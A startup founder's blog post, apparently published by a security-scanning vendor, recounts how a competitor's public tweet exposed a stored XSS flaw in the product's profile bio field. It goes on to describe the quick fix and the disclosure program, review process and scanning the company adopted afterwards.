TL;DR
A competitor discovered an XSS vulnerability in our product and tweeted about it before contacting us. The public disclosure was embarrassing and felt unfair, but it taught us important lessons about security, competition, and the value of having a vulnerability disclosure program in place.
The Tweet
I was having a normal Tuesday morning when my cofounder sent me a link to a tweet. It was from a developer at a competitor company.
"Just found a stored XSS vulnerability in our product. User input in profiles isn't sanitized. Anyone using this for sensitive data should be careful. @our handle you might want to look at this."
The tweet had a screenshot showing malicious JavaScript executing in our app. It already had 200+ retweets.
The Initial Reaction
My first emotion was anger. Why didn't they contact us privately? Why tweet it with screenshots? This felt like an attack disguised as helpfulness.
My second emotion was panic. If this was real (and the screenshot suggested it was), we had a serious vulnerability that was now public knowledge.
My third emotion, after calming down, was acceptance. Whatever the competitor's motives, the vulnerability existed. And that was our fault, not theirs.
Validating the Report
Within 10 minutes, we confirmed the vulnerability. The user profile "bio" field accepted HTML and JavaScript. When other users viewed a profile, the malicious code would execute in their browsers.
This was bad. An attacker could:
- Steal session tokens
- Redirect users to phishing pages
- Modify what users saw on the page
- Perform actions as the victim user
How we missed it: The bio field was added in a quick feature update. The developer assumed the frontend framework would handle sanitization. It didn't. There was no code review, no security testing. Classic "ship fast, fix later" thinking.
The Fix and Response
Technical Fix (30 minutes)
- Added input sanitization on the server side
- Added output encoding when rendering bios
- Sanitized all existing bio content in the database
- Added automated tests to prevent regression
Public Response
We replied to the tweet publicly:
"Thank you for reporting this. We've confirmed the vulnerability and deployed a fix within 30 minutes. We appreciate security reports and have set up security@our domain for future disclosures. We take this seriously and are reviewing our processes."
This response was carefully crafted. We thanked them (even though we were frustrated), confirmed we took it seriously, announced the fix, and showed we were learning from it.
The Aftermath
Customer Reaction
Some customers reached out concerned. We sent a proactive email to all users explaining what happened, what was at risk, and what we did to fix it. Most appreciated the transparency.
We lost two customers over it. We gained one who specifically said they liked how we handled the situation.
The Competitor
We never talked to them directly about it. Part of me wanted to call them out for the public disclosure. But the more I thought about it, the more I realized:
- They didn't create the vulnerability; we did
- We didn't have a clear way for people to report security issues
- Public disclosure, while uncomfortable, got us to fix it faster
The uncomfortable truth: If we'd had a security contact, a vulnerability disclosure program, or a bug bounty, they might have reported it privately. The public disclosure happened because we made it the only visible option.
What We Changed
Vulnerability Disclosure Program
We created a security.txt file and a clear process for reporting vulnerabilities. We committed to responding within 24 hours and fixing critical issues within 72 hours.
Security Review Process
Any feature that handles user input now requires a security review. We created a checklist: sanitization, encoding, validation, access control.
Automated Security Scanning
We added automated security scanning to our CI/CD pipeline. It catches common vulnerabilities like XSS before they reach production.
Regular Audits
Quarterly security reviews of our codebase, focusing on areas that handle user input, authentication, and data access.
Lessons on Competition and Security
This experience taught me that security vulnerabilities don't care about competitive dynamics. Your users are at risk regardless of who finds the flaw.
Yes, the competitor could have handled it better. But so could we. We could have:
- Not had the vulnerability in the first place
- Had a clear way for anyone to report security issues
- Been doing regular security testing ourselves
Blaming the messenger doesn't fix the message.
Should security researchers always disclose privately first?
Responsible disclosure norms suggest giving vendors time to fix issues before going public. However, if there's no clear way to report issues or vendors don't respond, public disclosure becomes more justifiable.
How do I set up a vulnerability disclosure program?
Start simple: create a security.txt file (securitytxt.org), add a security contact email, and publish a basic policy stating how you'll handle reports. You can expand to bug bounties later.
What's the difference between XSS types?
Stored XSS (like ours) saves malicious code in your database and executes when others view it. Reflected XSS comes from URL parameters. DOM-based XSS happens entirely in client-side code. All are serious.
How should I respond to public vulnerability disclosure?
Acknowledge quickly, thank the reporter (regardless of method), confirm you're investigating, announce when fixed. Don't be defensive or attack the reporter. Focus on protecting users.
Find Vulnerabilities First
Scan your app for XSS and other security issues before someone else does.
Start Free Scan